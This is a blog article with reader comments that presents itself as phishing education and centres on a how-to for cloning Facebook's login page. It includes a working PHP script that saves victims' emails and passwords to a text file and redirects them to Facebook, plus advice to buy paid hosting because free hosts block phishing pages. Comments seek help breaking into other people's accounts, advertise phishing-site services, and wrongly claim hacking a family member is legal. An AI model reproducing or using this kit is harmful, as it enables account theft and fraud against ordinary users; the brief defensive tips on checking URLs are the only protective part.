First of all, let me tell you that this article is written only for educating people about how phishing works and how should they prevent phishing scams. Please don’t use these techniques for malicious purposes.

What is Phishing?

Phishing is a most popular technique used for hacking passwords and stealing sensitive information like credit cards, banking username & passwords etc.

Phishing aka fishing attack is a process of creating a duplicate copy or a clone of a reputed website in the intention of stealing user’s password or other sensitive information like credit card details.

It is easy for anyone who is having little technical knowledge to get a phishing page done and that is why this method is so popular.

Phishing scams prompt users to enter sensitive details at a fake webpage (phishing page) whose look and feel are very identical to legitimate web pages. In most cases, the only difference is URL.

URL can also be spoofed in some cases if the legitimate website is vulnerable. It is difficult for a commoner to identify the phishing scams page because of its trustworthy layout.

Also, learn how hackers hack facebook account password account in few minutes and their prevention techniques.

How does phishing work?

Hackers / Attackers target general public and send them phishing links through email or personal message where the victim is prompted to click on a link in the email. The user/victim will get navigated to a Phishing page that pretends to be legit.

Common people who don’t find that phishing page suspicious are induced to enter their sensitive information and all the information would get sent to the hacker/attacker.

Phishing Example

Let us take Facebook as an example.

Creating a page which perfectly looks like Facebook login page but putting it in a different URL like fakebook.com or faecbook.com or any URL which pretends to be legit. When a user lands on such page, he/she might think that is real Facebook login page and asking them to provide their username and password.

So the people who don’t find the fake login page suspicious might enter their username, password and the password information would be sent to the hacker/attacker who created it, simultaneously the victim would get redirected to the original Facebook page.

Real Life Example: John is a programmer, he creates a Facebook login page with some scripts to enable him to get the username and password information and put it in https://www.facebouk.com/make-money-online-tricks.

Peter is a friend of John. John sends a message to Peter “Hey Peter, I found a way to make money online easily you should definitely take a look at this https://www.facebouk.com/make-money-online-tricks”.

Peter navigate to the link and see a Facebook login page. As usual, Peter enters his username and password of Facebook. Now the username and password of Peter are sent to John and Peter get redirected to a money making tips page https://www.facebouk.com/make-money-online-tricks-tips.html. That’s all Peter’s Facebook account is hacked.

How to create a Phishing page in minutes?

We are going to take Facebook phishing page as an example.

  • Go to Facebook.com, make sure you are not logged in to Facebook.
  • Press Ctrl U to view the source code.
  • Copy the source code and paste it in a notepad.
  • Find the action attribute of the login form in the code. Search for keyword “action” without quotes by pressing Ctrl F in notepad. In Facebook login page, action attribute was filled with Facebook login process URL, replace it with process.php
  • You have to find name of input fields using inspect element (Ctrl Shft I in Chrome), in our case, it is email and pass
  • Save this file as index.html
  • Now you have to get username and password stored in a text file named phishing.txt
  • Create a file named process.php using the following code.

Process.php

<? if(isset($_POST[’email’]) && isset($_POST[‘pass’])) { $password=file_get_contents(‘phishing.txt’); $phishing = fopen(“phishing.txt”,”w”); fwrite($phishing,$password.”Email : “.$_POST[’email’].” , Password”.$_POST[‘pass’].”\n”); fclose($file); echo ‘<script>window.location.href=”https://wwww.facebook.com/”</script>’; } else echo ‘<script>window.location.href=”index.html”</script>’; ?>

How to host phishing page in a URL?

To put phishing page in a URL, you need to have two things.

  1. Domain
  2. Web Hosting

Get a Free Domain

You can create a lifetime free domain at Bluehost if you pay for their hosting plans. Once you create a domain, you need to get hosting and setup name servers for it. If you select Bluehost you don’t need to setup nameservers since it will already be set.

Get Web Hosting

Almost all free hosting panels would block phishing pages. So you need to get any paid shared hosting package, it would cost around $4 USD per month. I prefer Bluehost for their excellent service and performance. You can also read how to create a website in Bluehost if you are new to domain and hosting.

How could you protect yourself from phishing scams?

Hackers can reach you in many ways like email, personal messages, Facebook messages, Website ads etc. Clicking any links from these messages would lead you to a login page. Whenever you find an email that navigates you to a webpage, you should note only one thing which is URL because nobody can spoof URL except when there is any XSS zero-day vulnerability.

What is the URL you see in browser address bar? Is that really https://www.LEGITWEBSITE.com? Is there any Green color secure symbol (HTTPS) provided in the address bar? You can prevent hacking by remembering these questions. Also, see the below examples of Facebook phishing pages.

Perfect Phishing Pages

Facebook Phishing Scams
Note the misleading URL

Most of the people won’t suspect this page (snapshot given above) since there is https prefix with the green color secure icon and no mistake in www.facebook.com. But this is a phishing page how? Recheck the URL. It is https://www.facebook.com.infoknown.com so www.facebook.com is a subdomain of infoknown.com.

Google Chrome doesn’t differentiate the sub-domain and domain, unlike Firefox does. SSL Certificates (HTTPS) can be obtained from many vendors, few vendors give SSL Certificate for Free for 1 year. It’s not a big deal for a novice to create a perfect phishing page like this. So beware of it.

Facebook Phishing Scam page with email password
Facebook Phishing Page – Note the misleading URL.

This is a normal Facebook Phishing page with some modification in the word Facebook.

Phishing scams

Phishing scams are attempts by scammers/hackers/cybercriminals to trick you to enter your sensitive information like internet banking username & passwords, credit card details etc. As described above, phishing scams focus on retrieving monetary details indirectly.

Phishing Email

Most of the time phishing scams happens through email. Hackers spoof the email address of any legitimate website or authority to send phishing scam email, so the users are convinced to believe that the email is sent from a legit website.

An email address can be easily spoofed using email headers. Server scripting languages like PHP helps a commoner to spoof from email address easily. Popular email services like Gmail are smart enough to identify phishing email and route it to the spam folder. But still, there are some ways for a hacker to send phishing emails.

42 COMMENTS

  1. Please help me how to hack the FB account of crab mentality people because they posted unnecessary things about me because of jealousy

  2. i lost my Facebook account to a hacker who was my cousin. He refused to give me the password to my account even after i told him. it is now almost 4 years and i still can not access my account. i really need to hack in to it and close it. please help me.

  3. I don’t know where to find the Action Attribute for facebook is and i’ve been searching for it. I found the word action, but i don’t know what to remove. A picture would be very helpful and if you can help me out @vb_preston (Thats my Instagram)

  4. i need someone to help me learn much about hacking ….you can whats app me on +233507486287 please if you are willing to help pls contact me

  5. Hey, Can someone please help me , I want to hack someone’s facebook account it is very important. Please contact me I really need help

  6. My boyfriend just started smoking meth and from what Inwas told, he contacted them through his facebook. Can someone help me hack his facebook? I want to see how all of this started.

  7. window.location.href=”https://wwww.facebook.com/”’;
    }
    else
    echo ‘’;
    ?>
    how to solve?

  8. Isn’t this illegal telling how to hack another website like facebook . I guess that this is the reason why you are talking with such a complicated language , nobody except a pro hacker can understand you

    • It is illegal, unless you are hacking a family member *or* allowed by the owner which would be gray hat hacking/ white hat hacking. phishing attacks are mainly used by skids (Script Kiddys) that are whom still learning to hack. This is not for no pro hacker like you said above in your comment.. This is basic level. Now get into firewall breaching that is pro hacking using wireshark or nmap or even kali linux fire wall down tool. 🙂 Happy hacking -DevAnon666

  9. Hello someone help.
    I just wanna know my friend fb account.
    Its like he knows my secrets.
    Can u pls hack his fb account.
    Thanks.

  10. if u wanna make phishing site for facebook mobile view and desktop working 100% with ssl suported contact me +923485517917

LEAVE A REPLY

Please enter your comment!
Please enter your name here